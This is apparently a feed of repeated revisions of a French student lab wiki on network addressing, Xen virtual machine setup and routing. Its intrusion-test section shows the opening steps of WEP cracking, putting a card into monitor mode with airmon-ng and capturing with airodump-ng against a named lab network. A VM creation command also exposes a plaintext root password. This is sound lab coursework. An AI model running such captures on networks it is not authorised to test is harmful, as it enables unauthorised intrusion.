		<title>TP sysres IMA5 2021/2022 G2</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G2&amp;diff=56232"/>
				<updated>2021-10-25T14:58:46Z</updated>
		
		<summary type="html">&lt;p&gt;Rlassery : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Wiki compte-rendu de TP PRA - Aviran Tetia &amp;amp; Robin Lasserye&lt;br /&gt;
&lt;br /&gt;
= 1. Configuration du Réseau physique = &lt;br /&gt;
&lt;br /&gt;
[insérer image]&lt;br /&gt;
&lt;br /&gt;
=Plan d'adressage=&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! VLAN !!  Réseau IPv4 !! Réseau IPv6 !! @IPv4 virtuelle !! IPv4 6509E (E304) !! IPv4 C9200 (E306) !! IPv4 ISR4331 (SR52) !! SSID !! VM &lt;br /&gt;
|- &lt;br /&gt;
| Andrei / Julien || 10 || 10.00.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.00.0.250 || 10.00.0.251 || 10.00.0.252 || 10.00.0.253 || Jonquille || Kronenbourg&lt;br /&gt;
|-&lt;br /&gt;
| Robin / Aviran || 01 || 10.01.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.01.0.250 || 10.01.0.251 || 10.01.0.252 || 10.01.0.253 || Marguerite || Paixdieu&lt;br /&gt;
|-&lt;br /&gt;
| Axel / Guillaume || 02 || 10.02.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.02.0.250 || 10.02.0.251 || 10.02.0.252 || 10.02.0.253 || Pensee || Kasteel&lt;br /&gt;
|-&lt;br /&gt;
| Selim / Raphael || 03 || 10.03.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.04.0.250 || 10.03.0.251 || 10.03.0.252 || 10.03.0.253 || Lavende || Karmeliet&lt;br /&gt;
|-&lt;br /&gt;
| Helene / Camille || 04 || 10.04.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.03.0.250 || 10.04.0.251 || 10.04.0.252 || 10.04.0.253 || Tulipe || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Boris / Louis || 05 || 10.05.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.05.0.250 || 10.05.0.251 || 10.05.0.252 || 10.05.0.253 || Rose || Bellerose&lt;br /&gt;
|-&lt;br /&gt;
| Johnny / Arthur || 06 || 10.06.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.06.0.250 || 10.06.0.251 || 10.06.0.252 || 10.06.0.253 || Orchidee || Anosteke&lt;br /&gt;
|- &lt;br /&gt;
| Mel / Theo || 07 || 10.07.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.07.0.250 || 10.07.0.251 || 10.07.0.252 || 10.07.0.253 || Tournesol || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Khalil / Alvare || 08 || 10.08.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.08.0.250 || 10.08.0.251 || 10.08.0.252 || 10.08.0.253 || Lys || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| SOuleyman / Enoch || 09 || 10.09.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.09.0.250 || 10.09.0.251 || 10.09.0.252 || 10.09.0.253 || Pissenlit || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Clement || 110 || 10.10.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.10.0.250 || 10.10.0.251 || 10.10.0.252 || 10.10.0.253 || Coquelicot || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Table du VLAN 42&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! @IPv4 MV !! @IPv6 MV (auto) &lt;br /&gt;
|- &lt;br /&gt;
| Andrei / Julien || 193.48.57.176 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Robin / Aviran || 193.48.57.177 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Axel / Guillaume || 193.48.57.178 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Selim / Raphael || 193.48.57.179 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Helene / Camille || 193.48.57.180 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Boris / Louis || 193.48.57.181 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Johnny / Arthur || 193.48.57.182 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Mel / Theo || 193.48.57.183 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Khalil / Alvare || 193.48.57.184 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| SOuleyman / Enoch || 193.48.57.185 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Clement || 193.48.57.186 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Note : &lt;br /&gt;
&lt;br /&gt;
'''à compléter '''&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Entité !! Élève !! Domaine !! 193.48.57.176/28 !! 10.60.0.0/16 !! 2001:660:4401:60B0::/60 !! 2001:7A8:116E:60B0::/60 !! VLAN !! VLAN WIFI !! N° VRRP !! SSID n°1 !! SSID n°2&lt;br /&gt;
|-&lt;br /&gt;
| ROUTEUR E304&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.187&lt;br /&gt;
| &lt;br /&gt;
| :: :F0&lt;br /&gt;
| :: :F0&lt;br /&gt;
| 10.NN.00.250&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| ROUTEUR E306&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.188&lt;br /&gt;
| &lt;br /&gt;
| :: :F1&lt;br /&gt;
| :: :F1&lt;br /&gt;
| 10.NN.00.251&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| ROUTEUR SR52&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.189&lt;br /&gt;
| &lt;br /&gt;
| :: :F2&lt;br /&gt;
| :: :F2&lt;br /&gt;
| 10.NN.00.252&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| ROUTEUR FLOTTANTE&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.190&lt;br /&gt;
| &lt;br /&gt;
| :: :F3&lt;br /&gt;
| :: :F3&lt;br /&gt;
| 10.NN.00.253&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO 531 INTERCO-SA&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.40/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| 10.NN.00.253&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO E304&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.41/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO E306&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.42/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::2&lt;br /&gt;
| fe80::/10    ::2&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO SR53&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.43/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::3&lt;br /&gt;
| fe80::/10    ::3&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* Plan d'adressage IPv4 :&lt;br /&gt;
{| class=&amp;quot;plan_addr&amp;quot;&lt;br /&gt;
! VLAN !! Nom !! Réseau IPv4 !! Cisco 6509-E !! Cisco 9200 !! Cisco ISR 4331 !! Routeur plateforme maths/info !! PA Wifi n°1 !! PA Wifi n°2&lt;br /&gt;
|-&lt;br /&gt;
|&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
* Plan d'adressage IPv6 :&lt;br /&gt;
{| class=&amp;quot;plan_addr&amp;quot;&lt;br /&gt;
! VLAN !! Nom !! Réseau IPv6 !! Cisco 6509-E !! Cisco 9200 !! Cisco ISR 4331 !! Routeur plateforme maths/info !! PA Wifi n°1 !! PA Wifi n°2&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= 3. Configuration des Machines Virtuelles =&lt;br /&gt;
&lt;br /&gt;
On se connecte en ssh à capbreton :&lt;br /&gt;
 ssh root@capbreton&lt;br /&gt;
&lt;br /&gt;
Nous incluons le proxy de polytech dans nos variables d'environnement:&lt;br /&gt;
 export http_proxy=http://proxy.plil.fr:3128&lt;br /&gt;
&lt;br /&gt;
Nous procédons ensuite la création de la machine virtuelle, pour cela nous allons saisir les informations suivantes: le nom de la machine (ici Paixdieu), l'adresse IP (--ip) qui nous a été fourni durant la répartition des IP, l'adresse IP du routeur de la salle E306  (--gateway) et le masque du réseau correspondant à un /28 (--netmask) (le /27 étant divisé entre les deux classes), l'emplacement de nos disques virtuels (--dir), le mot de passe de la machine virtuel (---password) puis le type de distribution souhaitée, ici nous avons choisi Debian Bullseye (--dist).&lt;br /&gt;
 xen-create-image --hostname=Paixdieu --ip=193.48.57.177 --gateway=193.48.57.188 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
Ensuite, nous avons créé deux LV, chacun de 10 Go sur le groupe de volume de stockage:&lt;br /&gt;
 lvcreate -L10G -n Paixdieu1 storage&lt;br /&gt;
 lvcreate -L10G -n Paixdieu2 storage&lt;br /&gt;
&lt;br /&gt;
Puis nous les avons formatés au format ext4 de la manière suivante:&lt;br /&gt;
 mkfs.ext4 /dev/storage/Paixdieu1&lt;br /&gt;
 mkfs.ext4 /dev/storage/Paixdieu2&lt;br /&gt;
&lt;br /&gt;
nous modifions ensuite notre fichier &amp;quot;/etc/xen/Paixdieu.cfg&amp;quot; pour préciser l'ajout les volumes logiques Paixdieu1 et Paixdieu2, de plus on ajoute le bridge IMA5sc dans la fonction vif.&lt;br /&gt;
Pour cela on ajoute les lignes suivantes:&lt;br /&gt;
 #&lt;br /&gt;
 #  Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Paixdieu/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Paixdieu/swap.img,xvda1,w',&lt;br /&gt;
 &amp;gt; 		  'phy:/dev/storage/Paixdieu1,xvda,w',&lt;br /&gt;
 &amp;gt; 		  'phy:/dev/storage/Paixdieu2,xvda,w'&lt;br /&gt;
              ]&lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
 #&lt;br /&gt;
 #  Physical volumes&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
 #&lt;br /&gt;
 #  Hostname&lt;br /&gt;
 #&lt;br /&gt;
 name        = 'Paixdieu'&lt;br /&gt;
 &lt;br /&gt;
 #&lt;br /&gt;
 #  Networking&lt;br /&gt;
 #&lt;br /&gt;
  &amp;gt;vif         = [ 'ip=193.48.57.177 ,mac=00:16:3E:95:13:AE ,bridge=IMA5sc' ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
= 4. Architecture réseau =&lt;br /&gt;
&lt;br /&gt;
== L'architecture générale ==&lt;br /&gt;
[[Fichier:Pra diagrams.png]]&lt;br /&gt;
&lt;br /&gt;
== Les réseaux virtuels ==&lt;br /&gt;
&lt;br /&gt;
== Le routage du site (IPv4) ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Le routage du site (IPv6) ==&lt;br /&gt;
[insérer résumé]&lt;br /&gt;
&lt;br /&gt;
== Tests d'intrusion ==&lt;br /&gt;
Pendant que l'infrastructure réseau était en train d'être configurée, nous avons testé de casser une clé wep.&lt;br /&gt;
&lt;br /&gt;
Commandes réalisées sur un eeePC sous Linux :&lt;br /&gt;
&lt;br /&gt;
Mettre la carte réseau WiFi en mode monitor :&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlx40a5ef012de1&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Vérification que celle-ci est bien en mode monitor :&lt;br /&gt;
&lt;br /&gt;
 iwconfig&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Lancement de la capture des paquets :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng wlx40a5ef012de1&lt;br /&gt;
&lt;br /&gt;
BSSID choisi :&lt;br /&gt;
&lt;br /&gt;
 44:AD:D9:5F:87:09 =&amp;gt; kracotte10&lt;/div&gt;</summary>
		<author><name>Rlassery</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G2&amp;diff=56227</id>
		<title>TP sysres IMA5 2021/2022 G2</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G2&amp;diff=56227"/>
				<updated>2021-10-25T14:58:03Z</updated>
		
		<summary type="html">&lt;p&gt;Rlassery : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Wiki compte-rendu de TP PRA - Aviran Tetia &amp;amp; Robin Lasserye&lt;br /&gt;
&lt;br /&gt;
= 1. Configuration du Réseau physique = &lt;br /&gt;
&lt;br /&gt;
[insérer image]&lt;br /&gt;
&lt;br /&gt;
=Plan d'adressage=&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! VLAN !!  Réseau IPv4 !! Réseau IPv6 !! @IPv4 virtuelle !! IPv4 6509E (E304) !! IPv4 C9200 (E306) !! IPv4 ISR4331 (SR52) !! SSID !! VM &lt;br /&gt;
|- &lt;br /&gt;
| Andrei / Julien || 10 || 10.00.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.00.0.250 || 10.00.0.251 || 10.00.0.252 || 10.00.0.253 || Jonquille || Kronenbourg&lt;br /&gt;
|-&lt;br /&gt;
| Robin / Aviran || 01 || 10.01.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.01.0.250 || 10.01.0.251 || 10.01.0.252 || 10.01.0.253 || Marguerite || Paixdieu&lt;br /&gt;
|-&lt;br /&gt;
| Axel / Guillaume || 02 || 10.02.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.02.0.250 || 10.02.0.251 || 10.02.0.252 || 10.02.0.253 || Pensee || Kasteel&lt;br /&gt;
|-&lt;br /&gt;
| Selim / Raphael || 03 || 10.03.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.04.0.250 || 10.03.0.251 || 10.03.0.252 || 10.03.0.253 || Lavende || Karmeliet&lt;br /&gt;
|-&lt;br /&gt;
| Helene / Camille || 04 || 10.04.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.03.0.250 || 10.04.0.251 || 10.04.0.252 || 10.04.0.253 || Tulipe || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Boris / Louis || 05 || 10.05.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.05.0.250 || 10.05.0.251 || 10.05.0.252 || 10.05.0.253 || Rose || Bellerose&lt;br /&gt;
|-&lt;br /&gt;
| Johnny / Arthur || 06 || 10.06.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.06.0.250 || 10.06.0.251 || 10.06.0.252 || 10.06.0.253 || Orchidee || Anosteke&lt;br /&gt;
|- &lt;br /&gt;
| Mel / Theo || 07 || 10.07.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.07.0.250 || 10.07.0.251 || 10.07.0.252 || 10.07.0.253 || Tournesol || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Khalil / Alvare || 08 || 10.08.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.08.0.250 || 10.08.0.251 || 10.08.0.252 || 10.08.0.253 || Lys || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| SOuleyman / Enoch || 09 || 10.09.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.09.0.250 || 10.09.0.251 || 10.09.0.252 || 10.09.0.253 || Pissenlit || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Clement || 110 || 10.10.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.10.0.250 || 10.10.0.251 || 10.10.0.252 || 10.10.0.253 || Coquelicot || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Table du VLAN 42&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! @IPv4 MV !! @IPv6 MV (auto) &lt;br /&gt;
|- &lt;br /&gt;
| Andrei / Julien || 193.48.57.176 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Robin / Aviran || 193.48.57.177 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Axel / Guillaume || 193.48.57.178 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Selim / Raphael || 193.48.57.179 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Helene / Camille || 193.48.57.180 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Boris / Louis || 193.48.57.181 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Johnny / Arthur || 193.48.57.182 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Mel / Theo || 193.48.57.183 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Khalil / Alvare || 193.48.57.184 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| SOuleyman / Enoch || 193.48.57.185 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Clement || 193.48.57.186 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Note : &lt;br /&gt;
&lt;br /&gt;
'''à compléter '''&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Entité !! Élève !! Domaine !! 193.48.57.176/28 !! 10.60.0.0/16 !! 2001:660:4401:60B0::/60 !! 2001:7A8:116E:60B0::/60 !! VLAN !! VLAN WIFI !! N° VRRP !! SSID n°1 !! SSID n°2&lt;br /&gt;
|-&lt;br /&gt;
| ROUTEUR E304&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.187&lt;br /&gt;
| &lt;br /&gt;
| :: :F0&lt;br /&gt;
| :: :F0&lt;br /&gt;
| 10.NN.00.250&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| ROUTEUR E306&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.188&lt;br /&gt;
| &lt;br /&gt;
| :: :F1&lt;br /&gt;
| :: :F1&lt;br /&gt;
| 10.NN.00.251&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| ROUTEUR SR52&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.189&lt;br /&gt;
| &lt;br /&gt;
| :: :F2&lt;br /&gt;
| :: :F2&lt;br /&gt;
| 10.NN.00.252&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| ROUTEUR FLOTTANTE&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.190&lt;br /&gt;
| &lt;br /&gt;
| :: :F3&lt;br /&gt;
| :: :F3&lt;br /&gt;
| 10.NN.00.253&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO 531 INTERCO-SA&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.40/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| 10.NN.00.253&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO E304&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.41/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO E306&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.42/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::2&lt;br /&gt;
| fe80::/10    ::2&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO SR53&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.43/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::3&lt;br /&gt;
| fe80::/10    ::3&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* Plan d'adressage IPv4 :&lt;br /&gt;
{| class=&amp;quot;plan_addr&amp;quot;&lt;br /&gt;
! VLAN !! Nom !! Réseau IPv4 !! Cisco 6509-E !! Cisco 9200 !! Cisco ISR 4331 !! Routeur plateforme maths/info !! PA Wifi n°1 !! PA Wifi n°2&lt;br /&gt;
|-&lt;br /&gt;
|&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
* Plan d'adressage IPv6 :&lt;br /&gt;
{| class=&amp;quot;plan_addr&amp;quot;&lt;br /&gt;
! VLAN !! Nom !! Réseau IPv6 !! Cisco 6509-E !! Cisco 9200 !! Cisco ISR 4331 !! Routeur plateforme maths/info !! PA Wifi n°1 !! PA Wifi n°2&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= 3. Configuration des Machines Virtuelles =&lt;br /&gt;
&lt;br /&gt;
On se connecte en ssh à capbreton :&lt;br /&gt;
 ssh root@capbreton&lt;br /&gt;
&lt;br /&gt;
Nous incluons le proxy de polytech dans nos variables d'environnement:&lt;br /&gt;
 export http_proxy=http://proxy.plil.fr:3128&lt;br /&gt;
&lt;br /&gt;
Nous procédons ensuite la création de la machine virtuelle, pour cela nous allons saisir les informations suivantes: le nom de la machine (ici Paixdieu), l'adresse IP (--ip) qui nous a été fourni durant la répartition des IP, l'adresse IP du routeur de la salle E306  (--gateway) et le masque du réseau correspondant à un /28 (--netmask) (le /27 étant divisé entre les deux classes), l'emplacement de nos disques virtuels (--dir), le mot de passe de la machine virtuel (---password) puis le type de distribution souhaitée, ici nous avons choisi Debian Bullseye (--dist).&lt;br /&gt;
 xen-create-image --hostname=Paixdieu --ip=193.48.57.177 --gateway=193.48.57.188 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
Ensuite, nous avons créé deux LV, chacun de 10 Go sur le groupe de volume de stockage:&lt;br /&gt;
 lvcreate -L10G -n Paixdieu1 storage&lt;br /&gt;
 lvcreate -L10G -n Paixdieu2 storage&lt;br /&gt;
&lt;br /&gt;
Puis nous les avons formatés au format ext4 de la manière suivante:&lt;br /&gt;
 mkfs.ext4 /dev/storage/Paixdieu1&lt;br /&gt;
 mkfs.ext4 /dev/storage/Paixdieu2&lt;br /&gt;
&lt;br /&gt;
nous modifions ensuite notre fichier &amp;quot;/etc/xen/Paixdieu.cfg&amp;quot; pour préciser l'ajout les volumes logiques Paixdieu1 et Paixdieu2, de plus on ajoute le bridge IMA5sc dans la fonction vif.&lt;br /&gt;
Pour cela on ajoute les lignes suivantes:&lt;br /&gt;
 #&lt;br /&gt;
 #  Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Paixdieu/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Paixdieu/swap.img,xvda1,w',&lt;br /&gt;
&amp;gt; 		  'phy:/dev/storage/Paixdieu1,xvda,w',&lt;br /&gt;
&amp;gt; 		  'phy:/dev/storage/Paixdieu2,xvda,w'&lt;br /&gt;
              ]&lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
 #&lt;br /&gt;
 #  Physical volumes&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
 #&lt;br /&gt;
 #  Hostname&lt;br /&gt;
 #&lt;br /&gt;
 name        = 'Paixdieu'&lt;br /&gt;
 &lt;br /&gt;
 #&lt;br /&gt;
 #  Networking&lt;br /&gt;
 #&lt;br /&gt;
 &amp;gt;vif         = [ 'ip=193.48.57.177 ,mac=00:16:3E:95:13:AE ,bridge=IMA5sc' ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
= 4. Architecture réseau =&lt;br /&gt;
&lt;br /&gt;
== L'architecture générale ==&lt;br /&gt;
[[Fichier:Pra diagrams.png]]&lt;br /&gt;
&lt;br /&gt;
== Les réseaux virtuels ==&lt;br /&gt;
&lt;br /&gt;
== Le routage du site (IPv4) ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Le routage du site (IPv6) ==&lt;br /&gt;
[insérer résumé]&lt;br /&gt;
&lt;br /&gt;
== Tests d'intrusion ==&lt;br /&gt;
Pendant que l'infrastructure réseau était en train d'être configurée, nous avons testé de casser une clé wep.&lt;br /&gt;
&lt;br /&gt;
Commandes réalisées sur un eeePC sous Linux :&lt;br /&gt;
&lt;br /&gt;
Mettre la carte réseau WiFi en mode monitor :&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlx40a5ef012de1&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Vérification que celle-ci est bien en mode monitor :&lt;br /&gt;
&lt;br /&gt;
 iwconfig&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Lancement de la capture des paquets :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng wlx40a5ef012de1&lt;br /&gt;
&lt;br /&gt;
BSSID choisi :&lt;br /&gt;
&lt;br /&gt;
 44:AD:D9:5F:87:09 =&amp;gt; kracotte10&lt;/div&gt;</summary>
		<author><name>Rlassery</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G2&amp;diff=56212</id>
		<title>TP sysres IMA5 2021/2022 G2</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G2&amp;diff=56212"/>
				<updated>2021-10-25T14:49:16Z</updated>
		
		<summary type="html">&lt;p&gt;Rlassery : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Wiki compte-rendu de TP PRA - Aviran Tetia &amp;amp; Robin Lasserye&lt;br /&gt;
&lt;br /&gt;
= 1. Configuration du Réseau physique = &lt;br /&gt;
&lt;br /&gt;
[insérer image]&lt;br /&gt;
&lt;br /&gt;
=Plan d'adressage=&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! VLAN !!  Réseau IPv4 !! Réseau IPv6 !! @IPv4 virtuelle !! IPv4 6509E (E304) !! IPv4 C9200 (E306) !! IPv4 ISR4331 (SR52) !! SSID !! VM &lt;br /&gt;
|- &lt;br /&gt;
| Andrei / Julien || 10 || 10.00.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.00.0.250 || 10.00.0.251 || 10.00.0.252 || 10.00.0.253 || Jonquille || Kronenbourg&lt;br /&gt;
|-&lt;br /&gt;
| Robin / Aviran || 01 || 10.01.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.01.0.250 || 10.01.0.251 || 10.01.0.252 || 10.01.0.253 || Marguerite || Paixdieu&lt;br /&gt;
|-&lt;br /&gt;
| Axel / Guillaume || 02 || 10.02.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.02.0.250 || 10.02.0.251 || 10.02.0.252 || 10.02.0.253 || Pensee || Kasteel&lt;br /&gt;
|-&lt;br /&gt;
